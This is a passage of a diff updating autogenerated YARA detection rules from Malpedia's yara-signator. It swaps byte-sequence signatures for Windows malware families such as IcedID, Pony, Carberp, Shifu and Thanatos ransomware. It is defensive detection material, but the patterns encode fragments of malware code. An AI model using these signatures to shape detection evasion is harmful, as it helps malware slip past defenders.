+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icedid_downloader_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "bc347e2a2c2675d6f613a457b6f24810b2ee549a3110e9ad4ab849ea2adb4170"
+		logic_hash = "8833f99bb1bd77711eb78fc1bd4033ed964a1a4a33594d443cf638144662738b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -106954,62 +107074,32 @@ rule MALPEDIA_Win_Purplefox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 48898500040000 8bd8 4c899df8030000 90 }
-		$sequence_1 = { 64bba3ae1c94 af 6c 7924 5e 52 }
-		$sequence_2 = { 488d05fc900000 488b4c2430 483bc8 7405 e8???????? 488b05???????? }
-		$sequence_3 = { 8b0a 6a00 51 6800000100 50 ff15???????? 8bf0 }
-		$sequence_4 = { 4c8b642450 0f84c5000000 488364242000 488d05e17f0000 c64424600d 4a8b0ce0 }
-		$sequence_5 = { e8???????? e9???????? 8b570c 8b4708 }
-		$sequence_6 = { 750a b80d0000c0 e9???????? 488d7768 }
-		$sequence_7 = { 0f88c9000000 488b4c2460 ff15???????? 4839442470 0f85b3000000 488d542460 488bce }
-		$sequence_8 = { 488d4c2420 e8???????? eb1e 488b5710 488d0d21b10000 e8???????? 488b5710 }
-		$sequence_9 = { 85c0 0f88c7010000 4c8b05???????? 488b8d08040000 488d442470 }
-		$sequence_10 = { d565 96 dcb2503c62fc b23e ac 82d0e0 e460 }
-		$sequence_11 = { 55 8bec 33c0 8b4d08 3b0cc528bb4000 740a 40 }
-		$sequence_12 = { e8???????? 488b5710 488d4c2420 e8???????? }
-		$sequence_13 = { 56 6a1b 52 ffd7 85c0 7918 6a00 }
-		$sequence_14 = { 8bd8 85c0 0f8882000000 c744246800010000 4889742460 89742458 }
-		$sequence_15 = { 6a00 6a00 68000000c0 68???????? ff15???????? 8985e0fdffff }
-		$sequence_16 = { ff75e0 ff15???????? c9 c20800 6a00 6800100000 }
-		$sequence_17 = { 488d0d1b0f0000 ff15???????? 8bc7 eb02 33c0 }
-		$sequence_18 = { 348a 90 be7c1a1278 04b2 7a00 bc0ad47a56 }
-		$sequence_19 = { 9c f5 83c506 66892424 }
-		$sequence_20 = { 488bc8 ff15???????? 488d1528460000 488bce 488905???????? ff15???????? 488bc8 }
-		$sequence_21 = { 57 56 6a0b ffd3 3d040000c0 750d }
-		$sequence_22 = { 8945d0 8945d4 8945dc c745d880000000 }
-		$sequence_23 = { e9???????? 0fa3c3 8d861cae46c3 66b8f230 8b4500 }
-		$sequence_24 = { 488d0d55100000 ff15???????? 488b6c2450 8bc3 488b5c2468 }
-		$sequence_25 = { ff15???????? 8bc3 4881c4d0000000 5e 5b 5d c3 }
-		$sequence_26 = { 8d45ec e8???????? 33c0 0175dc 6800040000 }
-		$sequence_27 = { 83e61f 8d3c85000c4100 8b07 c1e606 f644300401 }
-		$sequence_28 = { 7681 f1 6c 3c9f 7d8b 017b29 }
-		$sequence_29 = { 8d95defdffff 33c9 52 8945f8 8945f4 8945f0 }
-		$sequence_30 = { 488d3d4c610000 eb0e 488b03 4885c0 7402 }
-		$sequence_31 = { 0483 bd1d8f909a 30a563491b40 5e a0???????? 4b }
-		$sequence_32 = { 6800020000 50 ff15???????? 85c0 790a 8b4df8 ffd3 }
-		$sequence_33 = { 8978f0 8b4df8 8948f4 c740e001000000 c740e40d000000 }
-		$sequence_34 = { 89df 2cfd 60 60 c0e002 b02e f9 }
-		$sequence_35 = { 51 50 e8???????? 85c0 7417 c70701000000 8b07 }
-		$sequence_36 = { 81fe00000001 7708 81c600100000 eb9b 8d4dc4 51 ff15???????? }
-		$sequence_37 = { 56 e8???????? 8bc6 c1f805 8b0485000c4100 83e61f c1e606 }
-		$sequence_38 = { 488d1578900000 483950f0 740b 488b10 4885d2 7403 }
-		$sequence_39 = { 48895c2418 55 56 57 4883ec30 488d3da9b40000 33ed }
+		$sequence_0 = { 50 57 ff742430 ff5660 }
+		$sequence_1 = { 8bd8 85db 7413 6a01 56 }
+		$sequence_2 = { 6a01 6a08 6689742434 ff15???????? 68???????? 89442434 }
+		$sequence_3 = { 0ad8 885c2418 45 83c708 3b2e }
+		$sequence_4 = { ff7010 ff75f4 e8???????? 83c410 8bd8 ff75ec ff15???????? }
+		$sequence_5 = { 8d442428 50 ff742438 ff15???????? 8d442440 50 68???????? }
+		$sequence_6 = { ff15???????? 6a05 5b 8d4554 c7450001000000 50 }
+		$sequence_7 = { 6a0b 58 668945c4 8d75d4 33c0 c745dc00330000 6a16 }
+		$sequence_8 = { b805400080 eb76 ff7508 ff15???????? }
+		$sequence_9 = { 50 8d45d4 66895d04 50 57 }
 
 	condition:
-		7 of them and filesize < 1983488
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Scranos_Auto : FILE
+rule MALPEDIA_Win_Turnedup_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3bc50a28-b6e6-5463-a597-05290715703b"
+		id = "9cef3df1-e6dd-5dcd-8eeb-7fa8aae510b3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scranos_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.turnedup_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "55c9e24c122b178b35286bb9d84ccadcfb35aee7a1a2177725fac28566a869c1"
+		logic_hash = "f114ccc267f7ff6c1934261ef01804f10c4ed0bd6285f48c3f30e4d8aac2153d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107023,32 +107113,32 @@ rule MALPEDIA_Win_Scranos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5510 0355fc 8a02 8845fb 0fbe4dfb 85c9 0f848a000000 }
-		$sequence_1 = { b83f000000 5b 83c408 c3 894f10 894714 8b96280c0000 }
-		$sequence_2 = { 8b55e8 3b956cffffff 0f8d9c000000 8b45e8 8b8c8530ffffff 8b55e8 8b4154 }
-		$sequence_3 = { 8b55e8 8b451c 8b0c90 6bc918 8b5514 8b4204 8b0c08 }
-		$sequence_4 = { 8b55fc 52 e8???????? 83c408 8945f8 817df8ce030000 7739 }
-		$sequence_5 = { 8bca 81e10000f000 81f900004000 56 57 7f6c 7455 }
-		$sequence_6 = { e9???????? e8???????? 85c0 747d 8b442418 8b4c2414 830b02 }
-		$sequence_7 = { e8???????? 8945b0 8b4db0 898d30ffffff 8d9530ffffff 52 8b8decfeffff }
-		$sequence_8 = { 8b8d9cfeffff 8b511c 52 8b8580feffff 50 8b4d08 51 }
-		$sequence_9 = { 8bd3 8b32 3b31 7512 83e804 83c104 83c204 }
+		$sequence_0 = { 7414 85c0 780a b900020000 2bca }
+		$sequence_1 = { 8b5dbc c60365 8b0e 43 895dbc 85c9 }
+		$sequence_2 = { 391d???????? 757d 6a01 53 8d450c 50 }
+		$sequence_3 = { 895dfc 752b 6a00 8d4df8 e8???????? 833d????????00 }
+		$sequence_4 = { 60 33c0 3e8b7c2424 33c9 }
+		$sequence_5 = { 7434 8b4120 833800 741b 8b5130 833a00 7e13 }
+		$sequence_6 = { 83ec1c 8bcc 6a14 c741140f000000 }
+		$sequence_7 = { e8???????? 83c404 3bc3 7433 8b0d???????? 8904b1 }
+		$sequence_8 = { 6a01 8bcf ffd0 8b4da4 8b11 8b520c }
+		$sequence_9 = { 8b5f10 85db 7438 8b4f14 83f910 }
 
 	condition:
-		7 of them and filesize < 2859008
+		7 of them and filesize < 892928
 }
-rule MALPEDIA_Win_Pony_Auto : FILE
+rule MALPEDIA_Win_Unidentified_031_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24263a04-20d7-5949-957f-cf3a5af796d6"
+		id = "a72a563f-a4f8-5666-a877-ef8f429f5482"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pony_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_031_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f326d7c326c50f16cd34726bcea70a2ea74ad41815b2b6e851f1de5995c35b2f"
+		logic_hash = "433c3a1b1a13dcc2934f251d10014182069dee4462cd06fa5b97124ebfc25ecc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107062,32 +107152,32 @@ rule MALPEDIA_Win_Pony_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75fc ff15???????? 5e c9 c20400 55 8bec }
-		$sequence_1 = { 8d840744eabea4 034604 c1c004 03c3 8bfb 33f9 33f8 }
-		$sequence_2 = { e8???????? ffb5dcf7ffff ff7508 e8???????? }
-		$sequence_3 = { 8bf0 e9???????? 8b4514 833800 7505 e9???????? c745fc00000000 }
-		$sequence_4 = { c20c00 55 8bec 81c4ecfeffff 53 ff750c }
-		$sequence_5 = { 55 8bec 83c4fc 6a00 6a06 ff7508 }
-		$sequence_6 = { ff7510 e8???????? 8d45dc 50 8d45e0 50 8d45e4 }
-		$sequence_7 = { ff7514 ff7510 ff7508 e8???????? 8bf8 837dfc00 7423 }
-		$sequence_8 = { 8d8c0f8e4379a6 034e38 c1c111 03ca 8bfa }
-		$sequence_9 = { c9 c20400 55 8bec 83c4f4 57 8b4514 }
+		$sequence_0 = { 7403 50 ffd7 ff36 ffd7 5f 832600 }
+		$sequence_1 = { 8b45ec 0504020000 50 ffd6 6a6b e8???????? 50 }
+		$sequence_2 = { 8bf8 83c410 85ff 0f84b2000000 85db 0f84a6000000 ff742414 }
+		$sequence_3 = { 8b13 83c410 52 68???????? ff15???????? 8bd0 8d4dc4 }
+		$sequence_4 = { 51 6808200000 ff15???????? 8985fcfeffff 8d95fcfeffff 8d45cc 52 }
+		$sequence_5 = { 6805e9e3a9 6a05 8b0401 8b4dcc 50 8b45d0 51 }
+		$sequence_6 = { ff75e0 ff15???????? 59 59 85c0 0f8505010000 ff75e0 }
+		$sequence_7 = { 2bf8 83ff40 0f87a0000000 8b8d74ffffff 8d4701 50 8b8570ffffff }
+		$sequence_8 = { 898dd0fdffff 52 8d8d08ffffff 50 51 899dd8fdffff 899dc8fdffff }
+		$sequence_9 = { 74a3 837dd400 755d ff75d0 8b45cc 8b4de4 ff75d8 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 1998848
 }
-rule MALPEDIA_Win_Zebrocy_Auto : FILE
+rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3e5f6c21-b107-5927-ab15-3b5f7930bd9f"
+		id = "ab4a7e75-8b1e-5a05-9767-529b8f947adc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zebrocy_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thanatos_ransom_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "441b6c0eb1e7ad657ed1ddd776f40e36e6f7013a1b8efb6494c5b91191385474"
+		logic_hash = "92f92876fe7a3f7974d946f7e2104d595ba94070884727a043f8a6a9bbc163b3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107101,38 +107191,32 @@ rule MALPEDIA_Win_Zebrocy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945e4 e8???????? 89f9 89c6 e8???????? 8b55e4 }
-		$sequence_1 = { 8d45f4 64a300000000 8b01 8d7160 8b4804 8975f0 c74431a05c444200 }
-		$sequence_2 = { ff0d???????? ff15???????? 8b0d???????? 89048d489b4200 }
-		$sequence_3 = { 8bc8 8bc6 c644246001 e8???????? be10000000 3974242c 720d }
-		$sequence_4 = { a3???????? 8078086c 7507 c605????????01 }
-		$sequence_5 = { 8d51bf 55 8d4120 80fa19 89e5 }
-		$sequence_6 = { c686c800000043 c6864b01000043 c74668d0874200 6a0d }
-		$sequence_7 = { 83f83f 7f07 894c8204 40 8902 5d }
-		$sequence_8 = { 53 8d70ff 31db 31c0 39f3 }
-		$sequence_9 = { 7505 e8???????? 84db 7407 }
-		$sequence_10 = { b9ffff0000 663bc8 750e c745ec04000000 8da42400000000 837dec00 }
-		$sequence_11 = { 8b4508 33f6 89b578ffffff ba0f000000 895314 }
-		$sequence_12 = { 42 89f9 884b08 ebe7 83c42c 5b }
-		$sequence_13 = { e9???????? 8d4dd4 e9???????? 8d8d08ffffff e9???????? 8d4db8 }
-		$sequence_14 = { 7306 8d8508f7ffff 8a1c38 8db598f6ffff e8???????? }
-		$sequence_15 = { eb50 31d2 89d9 e8???????? }
+		$sequence_0 = { 8b0485e0774300 894df0 8a440129 8b4d08 8845ff }
+		$sequence_1 = { e8???????? 3bf0 7419 4e }
+		$sequence_2 = { e8???????? 83c404 c645fc0e 83781410 7202 8b00 }
+		$sequence_3 = { c644012801 8b0495e0774300 897c0118 8bfe e9???????? }
+		$sequence_4 = { e8???????? c645fc04 8b45d4 83f810 7242 8b4dc0 }
+		$sequence_5 = { e9???????? 8d8db8feffff e9???????? 8d8d70feffff e9???????? 8d8d88feffff }
+		$sequence_6 = { ff15???????? 8b859cfeffff 83f810 7245 8b8d88feffff }
+		$sequence_7 = { 6a04 58 6bc000 8b4d08 898814714300 }
+		$sequence_8 = { ff758c e8???????? 33c0 c745a007000000 c7459c00000000 6689458c 39856cffffff }
+		$sequence_9 = { 6af6 ff15???????? 8b04bde0774300 834c0318ff 33c0 }
 
 	condition:
-		7 of them and filesize < 393216
+		7 of them and filesize < 516096
 }
-rule MALPEDIA_Win_Threebyte_Auto : FILE
+rule MALPEDIA_Win_Xsplus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db751837-d9fe-5bbc-8e37-81fa1047a177"
+		id = "2c89d099-29a9-55d4-a949-65dd1bdfe6eb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.threebyte_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xsplus_auto.yar#L1-L179"
 		license_url = "N/A"
-		logic_hash = "b532d976fb568c958de01f6c83348e2db5990a266537c8833f6f4b97f2236efc"
+		logic_hash = "e49d0b0e4b6b18be179499d3f98b92cb7a2ea53651dc18e80a64f9c221a6561b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107146,32 +107230,39 @@ rule MALPEDIA_Win_Threebyte_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7411 8b55b8 52 ff15???????? 33c0 e9???????? }
-		$sequence_1 = { 8b85f0fdffff 8b08 8b95f0fdffff 52 ff510c 8985ecfdffff 83bdecfdffff00 }
-		$sequence_2 = { c78524f7ffff00000000 c78514f7ffff00000000 8d8514f7ffff 50 8b8d18f7ffff 2b8d24f7ffff }
-		$sequence_3 = { c6851cf8ffff73 c6851df8ffff00 8d85ccfcffff 50 6804010000 ff15???????? 8d8decfeffff }
-		$sequence_4 = { c685d2fdffff74 c685d3fdffff65 c685d4fdffff72 c685d5fdffff6e c685d6fdffff65 c685d7fdffff74 c685d8fdffff20 }
-		$sequence_5 = { ff500c 8b4df0 51 e8???????? 83c404 83c8ff e9???????? }
-		$sequence_6 = { 50 e8???????? 83c408 8945cc e9???????? c6852cfeffff77 c6852dfeffff69 }
-		$sequence_7 = { 8d956cf7ffff 52 e8???????? 83c418 6a00 6800000004 }
-		$sequence_8 = { 83c101 51 6a00 8b9520f7ffff 52 e8???????? 83c40c }
-		$sequence_9 = { c68515feffff75 c68516feffff6e c68517feffff20 c68518feffff00 c68524feffff73 c68525feffff6c c68526feffff65 }
+		$sequence_0 = { 8b4608 8b7e20 8b36 66394f18 75f2 }
+		$sequence_1 = { 51 6801000080 ff15???????? 85c0 7529 8b5518 52 }
+		$sequence_2 = { 6a40 0020 6b40008a 46 }
+		$sequence_3 = { 8b8da4feffff 51 6a00 ff15???????? }
+		$sequence_4 = { 52 ff15???????? 6a2e 8d85f8feffff 50 }
+		$sequence_5 = { a1???????? c705????????04264000 8935???????? a3???????? ff15???????? a3???????? 83f8ff }
+		$sequence_6 = { 837dc400 7505 8b45e0 eb63 }
+		$sequence_7 = { 7453 83bdb8fdffff10 7436 e9???????? 81bdb8fdffff11010000 }
+		$sequence_8 = { 8945dc 6a05 8b45dc 50 }
+		$sequence_9 = { e9???????? 8975e4 33c0 39b810a84000 0f8491000000 }
+		$sequence_10 = { a1???????? a3???????? a1???????? c705????????04264000 8935???????? }
+		$sequence_11 = { ff75e4 ffd3 8986fc010000 897e70 c686c800000043 c6864b01000043 c74668e0a34000 }
+		$sequence_12 = { 3945e0 7608 8b45e0 e9???????? c685f8feffff00 b918000000 33c0 }
+		$sequence_13 = { 8bec 83ec2c c745d406000000 6a00 6a00 6809100000 }
+		$sequence_14 = { 51 8b55fc 8b02 8b4dfc 51 ff500c }
+		$sequence_15 = { ff15???????? 83c40c 8d95fcfeffff 52 ff15???????? 6a00 6880000000 }
+		$sequence_16 = { 8b8d90feffff 51 e8???????? 83c404 b801000000 eb02 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 597872
 }
-rule MALPEDIA_Win_Logpos_Auto : FILE
+rule MALPEDIA_Win_Ahtapot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "35b4ad0a-906a-5aa4-a185-d299d314c772"
+		id = "205853ed-0c62-5497-8ae7-152aba719174"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.logpos_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ahtapot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ahtapot_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "1f09c571a98b8191fefaf5488e1ffd2ed1ffe04d05c499ee0ffd2f1f5274e533"
+		logic_hash = "392656dae04b266a3580579c812b8abd790d9485771e5a66abe1a48d413d41a8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107185,32 +107276,32 @@ rule MALPEDIA_Win_Logpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 ff15???????? 8945e4 8b450c 8b5510 }
-		$sequence_1 = { 8945fc 837dfc00 75df 8b45fc 89ec 5d }
-		$sequence_2 = { 8f45d8 4c 8b55c8 48 }
-		$sequence_3 = { a3???????? a1???????? 8b5508 8910 6a20 }
-		$sequence_4 = { b801000000 eb05 b800000000 8945d0 8b45d4 8d50ff 8955d4 }
-		$sequence_5 = { 83f800 75cb 8b45fc 83f802 7c05 }
-		$sequence_6 = { eb05 b800000000 89442410 8b442414 678d50ff 89542414 }
-		$sequence_7 = { 85c9 7408 48 89c8 48 8b09 ebf3 }
-		$sequence_8 = { 4d 89dc 48 0fb610 80fa2e 740b 41 }
-		$sequence_9 = { e8???????? 83c404 83f800 0f8537000000 833d????????00 0f852a000000 837d1400 }
+		$sequence_0 = { ffd6 6a44 8d8d44f5ffff 53 51 e8???????? }
+		$sequence_1 = { 51 68???????? e8???????? 83c404 50 68???????? 8d95c8f3ffff }
+		$sequence_2 = { 6a00 6a00 8d85e0f2ffff 50 6a00 ff15???????? 8b8dcceeffff }
+		$sequence_3 = { 741e 6683f80d 74d8 668907 83c702 33c9 66890f }
+		$sequence_4 = { 33c9 83f823 741a 8d93fc100000 8d4900 46 668902 }
+		$sequence_5 = { 8985f0ebffff 52 8d85f0ebffff 50 898df4ebffff }
+		$sequence_6 = { 83c414 8d95c0edffff 52 ffd7 6a00 6a00 }
+		$sequence_7 = { 8d8528ecffff 8bff 668b10 663b11 751e 6685d2 7415 }
+		$sequence_8 = { 399db0cbffff 7526 8b8584cbffff 83c804 83e017 }
+		$sequence_9 = { 8bec 6aff 68???????? 64a100000000 50 81ecb00a0000 a1???????? }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 430080
 }
-rule MALPEDIA_Win_Royalcli_Auto : FILE
+rule MALPEDIA_Win_Shifu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff77d805-91a0-5315-ba44-9b60dd6ef815"
+		id = "48f59764-98d3-5e1f-a9c7-a0c8becc007a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.royalcli_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shifu_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "3f942fc64e71d9989fa602e154f4016ccbdc8b8d4e7f9551bd6f613b1bb3b100"
+		logic_hash = "6ab041a16a39f77276573be25c06c5ab679b44b2bef49091360ddb3582fc5f89"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107224,32 +107315,32 @@ rule MALPEDIA_Win_Royalcli_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8dfcfeffff 68???????? 51 e8???????? 83c408 e9???????? 8bc6 }
-		$sequence_1 = { 8b9db0feffff 83c410 85c0 0f8458feffff 8b95e8feffff 8b85ecfeffff 8bcf }
-		$sequence_2 = { eb1d 0fb6043e c1e802 8a9020144100 }
-		$sequence_3 = { 8d85f4feffff 50 ffd6 5e 8b4dfc 33cd b801000000 }
-		$sequence_4 = { 889c3dc0fdffff 47 8bd6 8bf1 }
-		$sequence_5 = { 80bc0500ffffff5c 7403 48 79f3 40 b9fa000000 }
-		$sequence_6 = { 52 ff15???????? 8bc6 8b4dfc 33cd }
-		$sequence_7 = { 8bf2 f3a5 8bc8 83e103 f3a4 8bbd84f7ffff 85ff }
-		$sequence_8 = { 7521 8b55fc 6a04 8d4df8 51 }
-		$sequence_9 = { 8b4508 53 56 68???????? 50 8bf1 e8???????? }
+		$sequence_0 = { 59 32c0 8d7d9c 6a08 f3aa 58 e8???????? }
+		$sequence_1 = { 50 8b470c 6a00 83c030 50 6a01 ffd3 }
+		$sequence_2 = { 83c8ff ebf0 55 8bec eb0a 8b4d08 48 }
+		$sequence_3 = { 8bc4 85c0 7411 6894000000 6a0b ba???????? e8???????? }
+		$sequence_4 = { 6a0c 5e e8???????? 8945f8 3bc7 0f847d030000 897808 }
+		$sequence_5 = { 83e203 c1e204 c1eb04 0bd3 8a1402 885601 }
+		$sequence_6 = { e8???????? 8bc4 85c0 7411 6889000000 6a0a }
+		$sequence_7 = { c645ff01 eb4a 807dff00 740f 8bf3 e8???????? 85c0 }
+		$sequence_8 = { 8bc4 85c0 7411 6882000000 6a0b ba???????? e8???????? }
+		$sequence_9 = { d1e8 8bf0 eb05 85db 7401 4b 83fb01 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Carberp_Auto : FILE
+rule MALPEDIA_Win_Unidentified_095_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a8c5eae-e871-515f-938c-f71747cf4ace"
+		id = "2cdecaec-fb60-5714-949a-43017e2a9367"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.carberp_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_095_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "7591c0ae0d97018ab7f451ed94881b2aa3238758f2aeec163b32e54490fa5153"
+		logic_hash = "26f94ce2105de641743f6ff5fce894a28fc2893a963b3d77519d919e034fdf59"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107263,32 +107354,32 @@ rule MALPEDIA_Win_Carberp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7704 e8???????? 8bf0 59 59 3bf3 0f8492000000 }
-		$sequence_1 = { 7504 0fb611 41 33f6 8ac2 2c30 3c09 }
-		$sequence_2 = { c645eb73 c645ec2e c645ed70 c645ee6c c645ef75 c645f067 c645f100 }
-		$sequence_3 = { 0f8565010000 57 56 e8???????? 59 53 be80000000 }
-		$sequence_4 = { 59 8975fc 3bf7 7507 32c0 e9???????? 53 }
-		$sequence_5 = { ff750c e8???????? ff7510 8d4e24 ff750c e8???????? 5e }
-		$sequence_6 = { 59 84c0 7526 57 68???????? 8d4e1c 897df0 }
-		$sequence_7 = { 55 8b6c2428 56 57 8bf8 8b442434 49 }
-		$sequence_8 = { ff742410 6a03 6a00 50 e8???????? 83c414 }
-		$sequence_9 = { ff75fc e8???????? 59 385d0f 0f843c010000 e8???????? 84c0 }
+		$sequence_0 = { 448be0 e8???????? 85c0 0f84e3000000 4883cfff 488bdf 48ffc3 }
+		$sequence_1 = { eb04 1bc0 8903 bf01000000 ff15???????? 4c8b742438 85ed }
+		$sequence_2 = { 4533db 498bd3 4c8d05b34dffff 4b8b8ce0a0450200 4803ca 48ffc2 46885cf13e }
+		$sequence_3 = { 41ffd6 be01000000 488bcf ff15???????? 4c8b742430 }
+		$sequence_4 = { 418be9 48c1f806 488d0da88e0100 4183e23f 4903e8 498bf0 }
+		$sequence_5 = { 4881c490000000 5d c3 4053 4883ec20 488bd9 }
+		$sequence_6 = { 488d0dc2f30100 e8???????? 488b442428 488905???????? 488d442428 4883c008 488905???????? }
+		$sequence_7 = { 4883ec40 48897c2460 33ed 4c89642470 4d8be1 4c896c2478 4d8be8 }
+		$sequence_8 = { 894c2428 488d156a4f0100 4889442420 e8???????? e9???????? 89758f e9???????? }
+		$sequence_9 = { 48894c2428 4885f6 0f848b000000 4533c0 488bd6 488bcb e8???????? }
 
 	condition:
-		7 of them and filesize < 491520
+		7 of them and filesize < 339968
 }
-rule MALPEDIA_Win_Coinminer_Auto : FILE
+rule MALPEDIA_Win_Cotx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e53c74f5-8d04-54ad-a733-6c3d22f8d0e4"
+		id = "618247d4-de94-5a5b-8702-f02eb35ee904"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.coinminer_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cotx_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "06dcc1977408b543966283c5e3d6aefe14c67fca3216b7316faa289a6df0dd9d"
+		logic_hash = "3b8fe5510fd419b8c1ff3124a08904512765ac561abd89e88faa984449f17fc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107302,32 +107393,32 @@ rule MALPEDIA_Win_Coinminer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 83ec10 8955f8 894dfc 56 57 85c9 }
